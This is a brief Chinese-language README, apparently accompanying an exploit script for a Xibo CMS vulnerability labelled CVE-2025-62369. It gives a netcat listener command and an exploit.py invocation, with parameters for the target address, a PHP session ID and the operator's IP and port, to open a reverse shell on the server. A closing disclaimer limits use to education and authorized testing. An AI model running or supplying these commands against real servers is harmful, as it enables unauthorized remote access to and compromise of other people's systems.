
此脚本利用 Xibo CMS 中的 CVE-2025-62369 漏洞执行反向 shell 命令。
nc -lvnp <PORT>
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -s "<PHPSESSID>" -i <LOCAL_IP> -p <PORT>
<TARGET_IP>:Xibo CMS 服务器 IP<TARGET_PORT>:Xibo CMS 服务器端口<PHPSESSID>:你的 PHP 会话 ID<LOCAL_IP>:用于接收反向 shell 的你的 IP<PORT>:反向 shell 端口(必须与你的监听器一致)免责声明:
此代码仅供教育和授权测试目的使用。